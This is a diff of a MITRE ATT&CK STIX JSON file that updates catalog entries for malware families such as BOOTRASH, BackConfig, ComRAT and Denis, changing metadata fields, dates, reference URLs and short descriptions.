+ "source_name": "FireEye BOOTRASH SANS",
+ "url": "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1498163766.pdf",
+ "description": "Glyer, C.. (2017, June 22). Boot What?. Retrieved May 4, 2020."
}
],
- "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that targets Windows operating systems. It has been used by threat actors that target the financial sector. (Citation: MTrends 2016)",
+ "description": "[BOOTRASH](https://attack.mitre.org/software/S0114) is a [Bootkit](https://attack.mitre.org/techniques/T1067) that targets Windows operating systems. It has been used by threat actors that target the financial sector.(Citation: Mandiant M Trends 2016)(Citation: FireEye Bootkits)(Citation: FireEye BOOTRASH SANS)",
"name": "BOOTRASH",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--da2ef4a9-7cbe-400a-a379-e2f230f28db3",
@@ -190910,15 +219476,18 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:29:45.507Z",
+ "modified": "2020-06-29T01:35:30.160Z",
"created": "2017-05-31T21:33:08.292Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Christopher Glyer, FireEye, @cglyer"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"BOOTRASH"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--67fc172a-36fa-4a35-88eb-4ba730ed52a6",
@@ -190946,13 +219515,13 @@
],
"modified": "2020-03-30T15:02:35.427Z",
"created": "2017-05-31T21:32:15.994Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BS2005"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--123bd7b3-675c-4b1a-8482-c55782b20e2b",
@@ -190980,14 +219549,14 @@
],
"modified": "2020-03-30T15:03:26.307Z",
"created": "2017-05-31T21:32:33.738Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BUBBLEWRAP",
"Backdoor.APT.FakeWinHTTPHelper"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191024,13 +219593,47 @@
],
"modified": "2020-03-30T15:06:31.915Z",
"created": "2019-10-07T19:05:48.886Z",
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "BabyShark"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "id": "malware--c13d9621-aca7-436b-ab3d-3a95badb3d00",
+ "name": "BackConfig",
+ "description": "[BackConfig](https://attack.mitre.org/software/S0475) is a custom Trojan with a flexible plugin architecture that has been used by [Patchwork](https://attack.mitre.org/groups/G0040).(Citation: Unit 42 BackConfig May 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0475",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0475"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T15:59:07.478Z",
+ "created": "2020-06-17T20:17:37.168Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
- "BabyShark"
+ "BackConfig"
],
- "x_mitre_version": "1.1"
+ "x_mitre_version": "1.0"
},
{
"id": "malware--083bb47b-02c8-4423-81a2-f9ef58572974",
@@ -191058,14 +219661,14 @@
],
"modified": "2020-03-30T02:49:50.902Z",
"created": "2017-05-31T21:32:59.661Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Backdoor.Oldrea",
"Havex"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191097,13 +219700,13 @@
],
"modified": "2020-03-17T00:22:32.796Z",
"created": "2019-01-29T21:33:34.082Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"BadPatch"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--835a79f1-842d-472d-b8f4-d54b545c341b",
@@ -191136,13 +219739,13 @@
],
"modified": "2020-03-30T15:08:51.834Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bandook"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--1f6e3702-7ca1-4582-b2e7-4591297d05a8",
@@ -191178,14 +219781,14 @@
],
"modified": "2020-03-30T20:41:17.223Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bankshot",
"Trojan Manuscript"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
@@ -191217,13 +219820,13 @@
],
"modified": "2020-03-30T18:38:49.119Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Bisonal"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
@@ -191237,7 +219840,7 @@
"external_id": "S0089"
},
{
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
"source_name": "F-Secure BlackEnergy 2014"
}
@@ -191249,16 +219852,16 @@
"labels": [
"malware"
],
- "modified": "2020-03-19T19:17:50.142Z",
+ "modified": "2020-06-18T20:43:34.069Z",
"created": "2017-05-31T21:32:57.807Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"BlackEnergy",
"Black Energy"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"object_marking_refs": [
@@ -191275,7 +219878,7 @@
"description": "(Citation: McAfee Gold Dragon)"
},
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
"source_name": "McAfee Gold Dragon"
}
@@ -191288,15 +219891,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:11:44.236Z",
+ "modified": "2020-04-21T23:09:30.781Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Brave Prince"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--79499993-a8d6-45eb-b343-bf58dea5bdde",
@@ -191341,6 +219944,45 @@
"modified": "2018-10-17T00:14:20.652Z",
"created": "2018-04-18T17:59:24.739Z"
},
+ {
+ "external_references": [
+ {
+ "external_id": "S0482",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0482"
+ },
+ {
+ "source_name": "OSX.Bundlore",
+ "description": "(Citation: MacKeeper Bundlore Apr 2019)"
+ },
+ {
+ "source_name": "MacKeeper Bundlore Apr 2019",
+ "url": "https://mackeeper.com/blog/post/610-macos-bundlore-adware-analysis/",
+ "description": "Sushko, O. (2019, April 17). macOS Bundlore: Mac Virus Bypassing macOS Security Features. Retrieved June 30, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Bundlore",
+ "description": "[Bundlore](https://attack.mitre.org/software/S0482) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://attack.mitre.org/software/S0482) has many features associated with more traditional backdoors.(Citation: MacKeeper Bundlore Apr 2019)",
+ "id": "malware--7bef1b56-4870-4e74-b32a-7dd88c390c44",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-06T15:18:53.409Z",
+ "created": "2020-07-01T19:34:28.366Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Bundlore",
+ "OSX.Bundlore"
+ ],
+ "x_mitre_platforms": [
+ "macOS"
+ ]
+ },
{
"id": "malware--5a84dc36-df0d-4053-9b7c-f0c388a57283",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -191367,13 +220009,52 @@
],
"modified": "2020-03-30T15:12:21.836Z",
"created": "2017-05-31T21:32:20.137Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CALENDAR"
],
+ "x_mitre_version": "1.2"
+ },
+ {
+ "id": "malware--1b9f0800-035e-4ed1-9648-b18294cc5bc8",
+ "name": "CARROTBAT",
+ "description": "[CARROTBAT](https://attack.mitre.org/software/S0462) is a customized dropper that has been in use since at least 2017. [CARROTBAT](https://attack.mitre.org/software/S0462) has been used to install [SYSCON](https://attack.mitre.org/software/S0464) and has infrastructure overlap with [KONNI](https://attack.mitre.org/software/S0356).(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0462",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0462"
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT November 2018",
+ "url": "https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/",
+ "description": "Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020."
+ },
+ {
+ "source_name": "Unit 42 CARROTBAT January 2020",
+ "url": "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/",
+ "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-15T15:13:27.660Z",
+ "created": "2020-06-02T14:11:40.581Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "CARROTBAT"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b0f13390-cec7-4814-b37c-ccec01887faa",
@@ -191406,15 +220087,21 @@
],
"modified": "2020-03-20T20:01:55.457Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CCBkdr"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
+ "created": "2017-05-31T21:32:19.389Z",
+ "modified": "2020-03-30T15:21:18.086Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -191478,19 +220165,7 @@
"name": "CHOPSTICK",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "malware--ccd61dfc-b03f-4689-8c18-7c97eab08472",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-30T15:21:18.086Z",
- "created": "2017-05-31T21:32:19.389Z",
- "x_mitre_contributors": [
- "Richard Gold, Digital Shadows"
- ],
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"CHOPSTICK",
"Backdoor.SofacyX",
@@ -191499,7 +220174,13 @@
"X-Agent",
"webhp"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ],
+ "x_mitre_contributors": [
+ "Richard Gold, Digital Shadows"
+ ]
},
{
"object_marking_refs": [
@@ -191531,13 +220212,13 @@
],
"modified": "2020-03-30T15:13:24.829Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"CORALDECK"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--60c18d06-7b91-4742-bae3-647845cd9d81",
@@ -191587,15 +220268,49 @@
],
"modified": "2020-03-30T15:14:36.623Z",
"created": "2017-05-31T21:33:18.506Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CORESHELL",
"Sofacy",
"SOURFACE"
],
+ "x_mitre_version": "2.1"
+ },
+ {
+ "created": "2020-05-22T20:07:15.628Z",
+ "modified": "2020-05-29T13:13:22.064Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) is a backdoor that has been used by [APT39](https://attack.mitre.org/groups/G0087).(Citation: Symantec Chafer Dec 2015)",
+ "name": "Cadelspy",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0454",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0454"
+ },
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Cadelspy"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--b8fdef82-d2cf-4948-8949-6466357b1be1",
@@ -191632,16 +220347,16 @@
],
"modified": "2020-03-30T01:58:55.849Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Calisto"
+ "x_mitre_platforms": [
+ "macOS"
],
"x_mitre_contributors": [
"Cody Thomas, SpecterOps"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_aliases": [
+ "Calisto"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--cb7bcf6f-085f-41db-81ee-4b68481661b5",
@@ -191669,13 +220384,13 @@
],
"modified": "2020-03-30T15:16:18.880Z",
"created": "2017-05-31T21:32:52.875Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"CallMe"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191712,13 +220427,13 @@
],
"modified": "2020-03-30T15:17:24.834Z",
"created": "2019-01-30T18:58:03.614Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Cannon"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--72f54d66-675d-4587-9bd3-4ed09f9522e4",
@@ -191764,14 +220479,14 @@
],
"modified": "2020-03-30T18:46:57.986Z",
"created": "2017-05-31T21:32:22.213Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Carbanak",
"Anunak"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -191808,13 +220523,13 @@
],
"modified": "2020-03-28T21:32:10.278Z",
"created": "2019-01-29T19:36:02.103Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Carbon"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--b879758f-bbc4-4cab-b5ba-177ac9b009b4",
@@ -191846,13 +220561,13 @@
],
"modified": "2020-03-30T01:59:34.624Z",
"created": "2019-01-30T16:39:53.573Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cardinal RAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8d9e758b-735f-4cbc-ba7c-32cd15138b2a",
@@ -191884,13 +220599,13 @@
],
"modified": "2020-03-17T23:40:44.651Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Catchamas"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--dc5d1a33-62aa-4a0c-aa8c-589b87beb11e",
@@ -191950,15 +220665,15 @@
],
"modified": "2020-03-30T18:49:40.093Z",
"created": "2017-05-31T21:33:22.451Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"ChChes",
"Scorpion",
"HAYMAKER"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -191988,15 +220703,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:19:17.909Z",
+ "modified": "2020-07-01T18:30:55.286Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Chaos"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"id": "malware--b2203c59-4089-4ee4-bfe1-28fa25f0dbfe",
@@ -192024,13 +220739,13 @@
],
"modified": "2020-03-30T15:20:05.298Z",
"created": "2017-05-31T21:33:05.710Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Cherry Picker"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -192072,13 +220787,13 @@
],
"modified": "2020-03-30T15:20:49.892Z",
"created": "2017-05-31T21:32:18.315Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"China Chopper"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--cbf646f1-7db5-4dc6-808b-0094313949df",
@@ -192111,15 +220826,15 @@
],
"modified": "2020-03-30T15:21:58.231Z",
"created": "2017-05-31T21:32:38.128Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CloudDuke",
"MiniDionis",
"CloudLook"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -192151,13 +220866,13 @@
],
"modified": "2020-03-30T15:22:42.218Z",
"created": "2019-01-29T21:40:37.350Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Cobian RAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--d1531eaa-9e17-473e-a680-3298469662c3",
@@ -192185,22 +220900,21 @@
],
"modified": "2020-03-30T15:23:53.711Z",
"created": "2019-04-23T18:41:36.914Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "CoinTicker"
+ "x_mitre_contributors": [
+ "Richie Cyrus, SpecterOps"
],
"x_mitre_platforms": [
"macOS"
],
- "x_mitre_contributors": [
- "Richie Cyrus, SpecterOps"
- ]
+ "x_mitre_aliases": [
+ "CoinTicker"
+ ],
+ "x_mitre_version": "1.1"
},
{
- "id": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "ComRAT",
- "description": "[ComRAT](https://attack.mitre.org/software/S0126) is a remote access tool suspected of being a decedent of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Symantec Waterbug) (Citation: NorthSec 2015 GData Uroburos Tools)",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -192210,23 +220924,32 @@
{
"source_name": "Symantec Waterbug",
"description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
- "url": "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf"
+ "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
},
{
"source_name": "NorthSec 2015 GData Uroburos Tools",
"description": "Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.",
- "url": "https://www.nsec.io/wp-content/uploads/2015/05/uroburos-actors-tools-1.1.pdf"
+ "url": "https://docplayer.net/101655589-Tools-used-by-the-uroburos-actors.html"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "description": "[ComRAT](https://attack.mitre.org/software/S0126) is a second stage implant suspected of being a descendant of [Agent.btz](https://attack.mitre.org/software/S0092) and used by [Turla](https://attack.mitre.org/groups/G0010). The first version of [ComRAT](https://attack.mitre.org/software/S0126) was identified in 2007, but the tool has undergone substantial development for many years since.(Citation: Symantec Waterbug)(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)",
+ "name": "ComRAT",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "malware--da5880b4-f7da-4869-85f2-e0aba84b8565",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T15:24:36.056Z",
+ "modified": "2020-07-06T14:40:26.004Z",
"created": "2017-05-31T21:33:13.252Z",
+ "x_mitre_contributors": [
+ "Matthieu Faou, ESET"
+ ],
"x_mitre_version": "1.1",
"x_mitre_aliases": [
"ComRAT"
@@ -192265,13 +220988,13 @@
],
"modified": "2020-03-30T15:25:11.871Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Comnie"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2eb9b131-d333-4a48-9eb4-d8dec46c19ee",
@@ -192299,16 +221022,16 @@
],
"modified": "2020-03-28T21:32:37.171Z",
"created": "2017-05-31T21:32:36.550Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CosmicDuke",
"TinyBaron",
"BotgenStudios",
"NemesisGemina"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e6ef745b-077f-42e1-a37d-29eecff9c754",
@@ -192336,7 +221059,9 @@
],
"modified": "2020-03-28T21:32:59.528Z",
"created": "2017-05-31T21:32:35.022Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"CozyCar",
"CozyDuke",
@@ -192344,9 +221069,7 @@
"Cozer",
"EuroAPT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--326af1cd-78e7-45b7-a326-125d2f7ef8f2",
@@ -192374,14 +221097,14 @@
],
"modified": "2020-03-30T15:25:59.334Z",
"created": "2017-05-31T21:33:08.679Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Crimson",
"MSIL/Crimson"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--a5e91d50-24fa-44ec-9894-39a88f658cea",
@@ -192413,15 +221136,15 @@
],
"modified": "2020-03-30T15:26:42.369Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "CrossRAT"
- ],
"x_mitre_platforms": [
"Linux",
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "CrossRAT"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
@@ -192491,13 +221214,13 @@
],
"modified": "2020-03-30T15:27:25.149Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DOGCALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--53ab35c2-d00e-491a-8753-41d35ae7e547",
@@ -192550,7 +221273,9 @@
],
"modified": "2020-03-28T00:53:12.228Z",
"created": "2019-01-29T19:18:28.468Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DarkComet",
"DarkKomet",
@@ -192558,9 +221283,7 @@
"Krademok",
"FYNLOS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--310f437b-29e7-4844-848c-7220868d074a",
@@ -192623,15 +221346,15 @@
],
"modified": "2020-03-30T02:04:21.751Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Daserf",
"Muirim",
"Nioupale"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8f460983-1bbb-4e7e-8094-f0b5e720f658",
@@ -192663,18 +221386,18 @@
],
"modified": "2020-03-30T15:28:13.547Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"DealersChoice"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"name": "Denis",
- "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan.(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) is a Windows backdoor and Trojan used by [APT32](https://attack.mitre.org/groups/G0050). [Denis](https://attack.mitre.org/software/S0354) shares several similarities to the [SOUNDBITE](https://attack.mitre.org/software/S0157) backdoor and has been used in conjunction with the [Goopy](https://attack.mitre.org/software/S0477) backdoor.(Citation: Cybereason Oceanlotus May 2017)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -192699,15 +221422,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T15:28:57.476Z",
+ "modified": "2020-06-30T15:06:42.569Z",
"created": "2019-01-30T20:01:44.815Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Denis"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--94379dec-5c87-49db-b36e-66abc0b81344",
@@ -192758,15 +221481,15 @@
],
"modified": "2020-03-30T18:59:10.146Z",
